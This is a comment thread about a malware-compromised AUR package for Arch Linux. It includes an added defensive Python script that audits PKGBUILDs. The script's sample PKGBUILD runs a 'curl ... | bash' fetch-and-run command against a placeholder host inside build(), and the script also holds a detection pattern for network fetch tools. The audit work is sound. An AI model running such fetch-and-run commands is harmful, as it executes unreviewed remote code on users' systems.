If you leave stuff by the side of the information superhighway someone will pick it up.
Who knew?
Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …
As an Arch user I am well aware of the potential dangers in installing software from the user-maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo outweigh the dangers; it just needs using with respect.
In general, any non-moderated repos offer this risk, it certainly is not limited to Arch.
And reading every PKGBUILD file? Sure, it will be more fun than reading every EULA for non-free software.
But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.
Just like what he did here. He put the malicious code in a script retrieved from the Internet.
What if you have a package that retrieves "additional data" from the Internet, not only a script?
Like a game retrieving its assets for example.
Should every single byte it downloads be checked?
I have seen multiple Windows users looking for software by going to Google and typing "$product free download" into it...
Yes, that's apparently still the norm for large numbers of people. BTW, if you come across one of those, tell them to go to the Wikipedia page for that product (yes, there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security-wise (though not perfect).
This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:
A) Download the build file manually and follow some steps to build the software
or
B) Install an extra package manager to automate performing A.
I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.
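The checks the commenters above describe (reading the PKGBUILD, noticing a source that is fetched from the Internet with no checksum, or a build step that pulls a script over the network) can be partly automated. The following Python script is an added example, not code from Arch, the AUR or any commenter; the package name, URLs and digests in the embedded PKGBUILD are constructed for illustration, and the three audit rules are a minimal heuristic, not makepkg's own validation.

```python
import re
import shlex

# Constructed sample PKGBUILD (hypothetical package, not a real AUR entry).
# It deliberately contains the three patterns the audit flags.
SAMPLE_PKGBUILD = r'''
pkgname=example-viewer
pkgver=1.0
pkgrel=1
pkgdesc="Hypothetical viewer used to demonstrate a PKGBUILD audit"
arch=('x86_64')
source=("https://example.invalid/example-viewer-1.0.tar.gz"
        "helper.sh::http://example.invalid/helper.sh"
        "fix-build.patch")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP'
            '1111111111111111111111111111111111111111111111111111111111111111')

build() {
    cd "$srcdir/example-viewer-$pkgver"
    curl -s https://example.invalid/setup.sh | bash
    make
}

package() {
    cd "$srcdir/example-viewer-$pkgver"
    make DESTDIR="$pkgdir" install
}
'''

# Bash arrays of the form name=( ... ), possibly spanning several lines.
ARRAY_RE = re.compile(
    r'^\s*(source|sha256sums|sha512sums|b2sums|md5sums)\s*=\s*\((.*?)\)',
    re.S | re.M)
# Function bodies that makepkg executes: name() { ... } with the closing brace at column 0.
FUNC_RE = re.compile(
    r'^(prepare|build|check|package)\s*\(\)\s*\{(.*?)^\}', re.S | re.M)
# Commands that pull content from the network at build time, bypassing source=() checksums.
FETCH_RE = re.compile(r'\b(curl|wget|git\s+clone|pip\s+install)\b')

CHECKSUM_ARRAYS = ('sha512sums', 'b2sums', 'sha256sums', 'md5sums')


def parse_arrays(text):
    """Return {array_name: [entries]} for the arrays the audit cares about."""
    return {name: shlex.split(body) for name, body in ARRAY_RE.findall(text)}


def source_url(entry):
    """A source entry may be written as localname::url; return the url part."""
    return entry.split('::', 1)[1] if '::' in entry else entry


def audit_pkgbuild(text):
    """Return a list of human-readable findings for one PKGBUILD."""
    findings = []
    arrays = parse_arrays(text)
    sources = arrays.get('source', [])

    # 1. Every remote source must be pinned by a real digest, not 'SKIP'.
    checksum_name = next((n for n in CHECKSUM_ARRAYS if n in arrays), None)
    if sources and checksum_name is None:
        findings.append('no checksum array for %d source entries' % len(sources))
    elif checksum_name:
        digests = arrays[checksum_name]
        if len(digests) != len(sources):
            findings.append('%s has %d entries but source has %d'
                            % (checksum_name, len(digests), len(sources)))
        for entry, digest in zip(sources, digests):
            if '://' in source_url(entry) and digest.upper() == 'SKIP':
                findings.append('remote source without checksum: ' + entry)
        if checksum_name == 'md5sums':
            findings.append('only md5sums present; prefer sha256sums or stronger')

    # 2. Cleartext transport lets an on-path party substitute the archive.
    for entry in sources:
        if source_url(entry).startswith('http://'):
            findings.append('cleartext download: ' + entry)

    # 3. Fetching inside prepare/build/package runs code that no checksum covers.
    for func, body in FUNC_RE.findall(text):
        for line in body.splitlines():
            stripped = line.strip()
            if stripped.startswith('#'):
                continue
            if FETCH_RE.search(stripped):
                findings.append('%s() fetches from the network at build time: %s'
                                % (func, stripped))
    return findings


if __name__ == '__main__':
    for finding in audit_pkgbuild(SAMPLE_PKGBUILD):
        print('-', finding)
```

Run against the embedded sample it reports the unchecked `helper.sh` download, the cleartext URL, and the `curl | bash` inside `build()`; a clean PKGBUILD with https sources, full digests and no network access in its functions yields no findings. Running it over the PKGBUILD of each pending update (or over the diff after a maintainer change, as suggested above) catches exactly the pattern in the acroread incident: a script fetched at build time that no checksum in the package covers.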
Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about its 'ports'-like nature: it's all well and good it being more convenient than downloading a src tarball, but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself, and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how many bits of linked-out code get added without downloading a corresponding patch file?).
Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).
Don't blame the Arch team for any of this; in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes, I know it doesn't deserve it and the page says you try at your own risk, but the halo effect is incredibly strong. It's why people still click on phishing emails from Microsoft Support.